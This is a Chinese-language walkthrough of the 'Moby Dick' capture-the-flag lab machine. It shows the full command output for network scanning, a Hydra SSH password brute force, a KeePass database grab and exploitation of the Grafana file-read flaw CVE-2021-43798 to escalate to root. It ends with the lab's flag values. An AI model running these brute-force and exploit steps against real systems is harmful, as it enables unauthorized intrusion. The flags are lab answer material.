TheHackersLabs-Moby Dick靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.138  08:00:27:5f:2c:af       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.970 seconds (129.95 hosts/sec). 4 responded
❯ export ip=192.168.60.138
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.138:22
Open 192.168.60.138:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 20:35 CST
Initiating ARP Ping Scan at 20:35
Scanning 192.168.60.138 [1 port]
Completed ARP Ping Scan at 20:35, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:35
Completed Parallel DNS resolution of 1 host. at 20:35, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:35
Scanning 192.168.60.138 [2 ports]
Discovered open port 22/tcp on 192.168.60.138
Discovered open port 80/tcp on 192.168.60.138
Completed SYN Stealth Scan at 20:35, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.138
Host is up, received arp-response (0.00065s latency).
Scanned at 2025-01-04 20:35:06 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:5F:2C:AF (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

80端口就是给默认的Apache的页面

尝试扫一下目录

扫到一个/penguin.php

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.138
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10671]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/penguin.php          (Status: 200) [Size: 89]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

用户提权

给了一点提示

其他一无所获，只能从这个提示上吗入手了

这个翻译有点问题小企鹅应该是某个用户名

hydra尝试爆破一下

❯ hydra -l pinguinito -P /usr/share/seclists/Passwords/richelieu-french-top5000.txt ssh://192.168.60.138
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-04 21:00:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 5000 login tries (l:1/p:5000), ~313 tries per task
[DATA] attacking ssh://192.168.60.138:22/
[STATUS] 269.00 tries/min, 269 tries in 00:01h, 4736 to do in 00:18h, 11 active
[STATUS] 174.00 tries/min, 522 tries in 00:03h, 4484 to do in 00:26h, 10 active
[22][ssh] host: 192.168.60.138   login: pinguinito   password: love
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-04 21:03:52
~                                                                                  

拿到密码了，ssh连接一下

有个kdbx文件，download到本地

❯ pwncat-cs  [email protected]
[21:06:18] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
Password: ****
[21:06:21] 192.168.60.138:22: registered new host w/ db                                                                                 manager.py:957
(local) pwncat$
(remote) pinguinito@ballenasio:/home/pinguinito$ ls
Database.kdbx  user.txt
(remote) pinguinito@ballenasio:/home/pinguinito$
(local) pwncat$ download Database.kdbx
Database.kdbx ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.4/2.4 KB • ? • 0:00:00
[21:06:31] downloaded 2.35KiB in 0.07 seconds  

尝试爆破，爆了好久出不来

但是回想之前的提示有个服务运行在docker上

但我们普通用户对docker是没有操作权限的

尝试访问一下默认docker容器内的ip

(remote) pinguinito@ballenasio:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
    link/ether 08:00:27:5f:2c:af brd ff:ff:ff:ff:ff:ff
    inet 192.168.60.138/24 metric 100 brd 192.168.60.255 scope global dynamic enp0s3
       valid_lft 1550sec preferred_lft 1550sec
    inet6 fe80::a00:27ff:fe5f:2caf/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:3e:04:c4:53 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:3eff:fe04:c453/64 scope link
       valid_lft forever preferred_lft forever
5: vethf50fec3@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether 0e:92:ac:a2:14:64 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::c92:acff:fea2:1464/64 scope link
       valid_lft forever preferred_lft forever
(remote) pinguinito@ballenasio:/tmp$ curl 172.17.0.2:3000
<a href="/login">Found</a>.

是有返回包发过来的，正好印证了猜想

漏洞利用

然而这个版本的Grafana有个文件读取漏洞

利用一下

❯ searchsploit grafana
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                      |  Path
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Grafana 7.0.1 - Denial of Service (PoC)                                                                             | linux/dos/48638.sh
Grafana 8.3.0 - Directory Traversal and Arbitrary File Read                                                         | multiple/webapps/50581.py
Grafana <=6.2.4 - HTML Injection                                                                                    | typescript/webapps/51073.txt
-------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
❯ searchsploit -m multiple/webapps/50581.py
  Exploit: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50581
     Path: /usr/share/exploitdb/exploits/multiple/webapps/50581.py
    Codes: CVE-2021-43798
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/ctf/50581.py
-------------------------------------
(local) pwncat$ upload 50581.py
./50581.py ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.8/2.8 KB • ? • 0:00:00
[21:40:02] uploaded 2.76KiB in 0.13 seconds                                                                                               upload.py:76
(local) pwncat$
(remote) pinguinito@ballenasio:/tmp$ python3 50581.py -H http://172.17.0.2:3000
Read file > /tmp/database_pass.txt
supermegastrongpasswordpenguin

Read file >

Root提权

拿到文件密码了，尝试在在线平台打开kdbx文件

拿到新的账户密码ballenasio secureballenasio

直接在本地切换一下

直接拿到root了，一箭双雕

(remote) pinguinito@ballenasio:/home/pinguinito$ su ballenasio
Password:
ballenasio@ballenasio:/home/pinguinito$ cd ~
ballenasio@ballenasio:~$ ls -al
total 36
drwxr-x--- 5 ballenasio ballenasio 4096 mar 12  2024 .
drwxr-xr-x 4 root       root       4096 mar 12  2024 ..
-rw------- 1 ballenasio ballenasio 3758 abr 16  2024 .bash_history
-rw-r--r-- 1 ballenasio ballenasio  220 ene  6  2022 .bash_logout
-rw-r--r-- 1 ballenasio ballenasio 3771 ene  6  2022 .bashrc
drwx------ 2 ballenasio ballenasio 4096 mar 12  2024 .cache
drwxrwxr-x 3 ballenasio ballenasio 4096 mar 12  2024 .local
-rw-r--r-- 1 ballenasio ballenasio  807 ene  6  2022 .profile
drwx------ 2 ballenasio ballenasio 4096 abr 16  2024 .ssh
-rw-r--r-- 1 ballenasio ballenasio    0 mar 12  2024 .sudo_as_admin_successful
ballenasio@ballenasio:~$ sudo -l
[sudo] password for ballenasio:
Matching Defaults entries for ballenasio on ballenasio:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User ballenasio may run the following commands on ballenasio:
    (ALL : ALL) ALL
ballenasio@ballenasio:~$ sudo su
root@ballenasio:/home/ballenasio# id
uid=0(root) gid=0(root) groups=0(root)
root@ballenasio:/home/ballenasio# cat /home/pinguinito/user.txt
84fb7c56943975d59d0ca2a8b085c7c2
root@ballenasio:/home/ballenasio# cat /root/root.txt
c616825bdc384507ab0566be8d00cdf8